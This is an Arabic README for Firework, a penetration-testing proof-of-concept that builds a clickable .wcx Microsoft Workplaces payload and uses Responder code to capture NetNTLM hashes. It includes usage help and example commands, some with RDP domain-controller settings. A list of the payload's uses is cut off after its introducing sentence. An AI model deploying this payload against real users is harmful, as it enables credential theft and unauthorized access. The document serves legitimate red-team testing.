
Firework هي أداة لإثبات المفهوم (PoC) للتفاعل مع Microsoft Workplaces عبر إنشاء ملفات صالحة مطلوبة لعملية التزويد (Provisioning).
⚠️ ملاحظة: لم تعد هذه الأداة قيد الصيانة النشطة.
Firework هي أداة إثبات مفهوم للتفاعل مع Microsoft Workplaces عن طريق إنشاء ملفات صالحة مطلوبة لعملية التزويد. تقوم الأداة أيضًا بتضمين بعض الكود من Responder للاستفادة من قدرته على التقاط تجزئات NetNTLM من نظام يقوم بتزويد موجز Workplace عبره.
يمكن استخدام هذه الأداة كجزء من اختبار اختراق أو تمرين فريق أحمر لإنشاء حمولة .wcx (وموجز مرتبط) والتي إذا تم النقر عليها يمكن استخدامها من أجل:
اقرأ مدونة SpiderLabs للحصول على ملخص وتوضيح أكثر تفصيلاً.
$ pip install -r requirements.txt
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"
الاستخدام: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]
أداة WCX لمساحات العمل
الوسائط الاختيارية:
-h, --help عرض رسالة المساعدة هذه والخروج
-c COMPANY, --company COMPANY
اسم الشركة
-u URL, --url URL عنوان URL للموجز
-a APP, --app APP اسم التطبيق
-e EXT, --ext EXT امتداد التطبيق
-i ICON, --icon ICON أيقونة التطبيق
-l LISTEN, --listen LISTEN
منفذ خادم الويب TLS
-r RDP, --rdp RDP خادم RDP
-d DOMAIN, --domain DOMAIN
مجال RDP
-n USERNAME, --username USERNAME
اسم مستخدم RDP
-p PASSWORD, --password PASSWORD
كلمة مرور RDP
-t CERT, --cert CERT شهادة SSL
-k KEY, --key KEY مفتاح SSL
مثال أساسي:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
سيبدأ خادم الويب المدمج على المنفذ 443 إذا كان cert.crt و key.pem موجودين في الدليل الحالي. سيؤدي هذا إلى فرض تحدي NTLM مع Responder. إذا لم تكن هذه الملفات موجودة، ستقوم الأداة بكتابة جميع الملفات إلى الدليل المحلي للاستضافة الخاصة بك.
إذا كنت ترغب في بدء خادم الويب المدمج على منفذ بديل، استخدم العلم -l كما يلي:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
يمكنك أيضًا إضافة بعض التخصيصات إلى ملف .rdp الذي يتم تقديمه.
ملاحظة: يتم تجاهل كلمات المرور المخزنة في ملفات .rdp على الأرجح في التكوين الافتراضي.
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <كلمة مرور مشفرة>
بعد تشغيل الأداة، سيتم كتابة ملف 'payload.wcx' في الدليل الحالي. هذا الملف هو الذي يؤدي النقر عليه إلى بدء عملية التزويد.
Firework
تم إنشاؤها بواسطة David Middlehurst حقوق الطبع والنشر (C) 2018 Trustwave Holdings, Inc.
هذا البرنامج هو برنامج مجاني: يمكنك إعادة توزيعه و/أو تعديله بموجب شروط رخصة GNU العامة كما نشرتها مؤسسة البرمجيات الحرة، إما الإصدار 3 من الرخصة، أو (حسب اختيارك) أي إصدار لاحق.
يتم توزيع هذا البرنامج على أمل أن يكون مفيدًا، ولكن دون أي ضمان؛ حتى بدون الضمان الضمني لـ القابلية للتسويق أو الملاءمة لغرض معين. راجع رخصة GNU العامة لمزيد من التفاصيل.